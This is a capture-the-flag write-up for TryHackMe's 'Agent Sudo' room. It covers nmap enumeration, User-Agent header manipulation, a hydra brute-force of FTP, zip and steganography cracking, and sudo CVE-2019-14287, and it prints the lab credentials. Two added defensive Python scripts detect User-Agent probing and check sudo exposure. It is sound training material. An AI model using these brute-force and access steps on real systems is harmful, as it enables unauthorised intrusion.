[THM] Agent Sudo

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.


Overview

This room consists of a protected web page: to access the useful information you have to modify the User-Agent header of the requests sent to the web server. After this you get a username and a hint that the password is weak, which lets you crack the password and access the FTP server with the credentials obtained.

Inside this server there is a .zip file that can be cracked, and it turns out there is a password inside. This process is repeated with the different files found until you obtain user credentials (user:password) that allow you to SSH into the machine.

To escalate privileges, the installed sudo version is checked and turns out to be affected by CVE-2019-14287.

[Task 2] Enumerate

$ nmap -sC -sV -T4 10.10.73.250
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 19:13 CEST
Nmap scan report for 10.10.73.250
Host is up (0.076s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds

#1 How many open ports?

3

#2 How you redirect yourself to a secret page?

user-agent

#3 What is the agent name?

I have done a web directory scan but have not found anything, nor on the ftp and ssh ports.

I admit that I had to look at the hint the web page gives, so I verified that if I change the User-Agent of the request made to the http server to the letter “C”, I receive in the response a “Location” header pointing to a php file:

GET / HTTP/1.1
Host: 10.10.73.250
User-Agent: C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

response received:

HTTP/1.1 302 Found
Date: Tue, 04 Aug 2020 17:28:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: agent_C_attention.php # !!!!!!!
Content-Length: 218
Connection: close
Content-Type: text/html; charset=UTF-8


<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>

<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>

Now I just open that file from my browser:

Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From,
Agent R

PS: chris's password is weak :) I can probably brute-force it.

chris
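An added example from the defender's side (my code, not part of the writeup): a Python script that parses Apache combined-format access logs, constructed here as sample lines, and flags requests whose User-Agent is a bare token like the codename above, marking which of them received a redirect.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format; the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format access log line into a dict, or None if malformed."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def is_odd_user_agent(ua: str) -> bool:
    """Browsers and tools send at least one product/version token ("Mozilla/5.0",
    "curl/7.68.0"); a bare codename like "C" has none. Apache logs a missing
    User-Agent as "-", which is flagged as well."""
    ua = ua.strip()
    return ua == "" or "/" not in ua or len(ua) <= 3

def flag_user_agent_probes(lines: List[str]) -> List[Dict[str, str]]:
    """Return parsed entries whose User-Agent looks hand-crafted. Each entry gets a
    'redirected' field so the reviewer sees which UA values unlocked another page (3xx)."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None or not is_odd_user_agent(entry["ua"]):
            continue
        entry["redirected"] = "yes" if entry["status"].startswith("3") else "no"
        hits.append(entry)
    return hits

# Constructed sample log lines (not taken from the room's server).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Aug/2020:19:20:01 +0200] "GET / HTTP/1.1" 200 218 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/79.0"',
    '10.0.0.5 - - [04/Aug/2020:19:28:50 +0200] "GET / HTTP/1.1" 302 218 "-" "C"',
    '10.0.0.5 - - [04/Aug/2020:19:29:03 +0200] "GET /agent_C_attention.php HTTP/1.1" 200 465 "-" "C"',
    '10.0.0.7 - - [04/Aug/2020:19:30:12 +0200] "GET /robots.txt HTTP/1.1" 404 275 "-" "curl/7.68.0"',
    "this line is not in combined format and is skipped",
]

if __name__ == "__main__":
    for hit in flag_user_agent_probes(SAMPLE_LOG):
        print(f'{hit["ip"]} UA={hit["ua"]!r} {hit["method"]} {hit["path"]} -> {hit["status"]} redirected={hit["redirected"]}')
```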

[Task 3] Hash cracking and brute-force

#1 FTP password

$ hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.73.250 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 19:35:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.73.250:21/
[STATUS] 232.00 tries/min, 232 tries in 00:01h, 14344167 to do in 1030:29h, 16 active
[21][ftp] host: 10.10.73.250 login: chris password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-04 19:37:04

crystal

#2 Zip file password

I did a bit of research and saw that agent J’s password is in an image; I found a simple script to crack the password of the zip in the image:

alien

#3 steg password

I find “QXJlYTUx” inside the To_agentR.txt file; I put it into CyberChef and get Area51.

Area51

#4 Who is the other agent (in full name)?

With the new password I try to extract something from the other image:

$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
$ cat message.txt
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

james

#5 SSH password

hackerrules!

[Task 4] Capture user flag

#1 What is the user flag?

********************************

#2 What is the incident of the photo called?

Roswell alien autopsy

[Task 5] Privilege escalation

#1 CVE number for the escalation

I use linpeas.sh to get some info, nothing useful; I search for the sudo version and find a privilege escalation vulnerability!

CVE-2019-14287
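As an added example, not from the writeup or the room, a Python check an administrator could run on the two inputs that decide exposure to CVE-2019-14287: the `sudo --version` output (the fix shipped in sudo 1.8.28) and the sudoers Runas_Spec entries that exclude root, which are the only entries the bug affects. The sudo output and sudoers excerpt below are constructed samples.

```python
import re
from typing import Dict, List, Optional, Tuple

# sudo 1.8.28 is the first release with the fix for CVE-2019-14287; older versions are affected.
FIXED_VERSION = (1, 8, 28)
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")
# "user HOST=(runas_spec) command": the parenthesised Runas_Spec is what we inspect.
RUNAS_RE = re.compile(r"^\s*(?!#)\S+\s+\S+\s*=\s*\(([^)]*)\)")

def parse_sudo_version(output: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from `sudo --version` output; 'p' levels are ignored."""
    m = VERSION_RE.search(output)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None

def version_is_affected(version: Tuple[int, int, int]) -> bool:
    return version < FIXED_VERSION

def risky_runas_lines(sudoers_text: str) -> List[str]:
    """Return sudoers entries whose Runas_Spec excludes root, e.g. "(ALL, !root)".
    CVE-2019-14287 only matters where such an entry exists: on an unpatched sudo the
    exclusion can be bypassed, so the entry effectively grants root."""
    risky = []
    for line in sudoers_text.splitlines():
        m = RUNAS_RE.match(line)
        if not m:
            continue
        runas = [tok.strip() for tok in m.group(1).split(",")]
        if any(tok in ("!root", "!#0") for tok in runas):
            risky.append(line.strip())
    return risky

def assess(sudo_version_output: str, sudoers_text: str) -> Dict[str, object]:
    """Combine both checks: exposed only if the version is old AND a risky entry exists."""
    version = parse_sudo_version(sudo_version_output)
    risky = risky_runas_lines(sudoers_text)
    affected = version is not None and version_is_affected(version)
    return {"version": version, "affected_version": affected,
            "risky_lines": risky, "exposed": affected and bool(risky)}

# Constructed samples (not the room's real files).
SAMPLE_SUDO_OUTPUT = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDOERS = """\
# constructed sudoers excerpt
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
bob     ALL=(ALL, !root) /bin/bash
"""
```

Run `assess(SAMPLE_SUDO_OUTPUT, SAMPLE_SUDOERS)` to get the verdict; on a real host feed it the output of `sudo --version` and the contents of /etc/sudoers plus /etc/sudoers.d/*.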
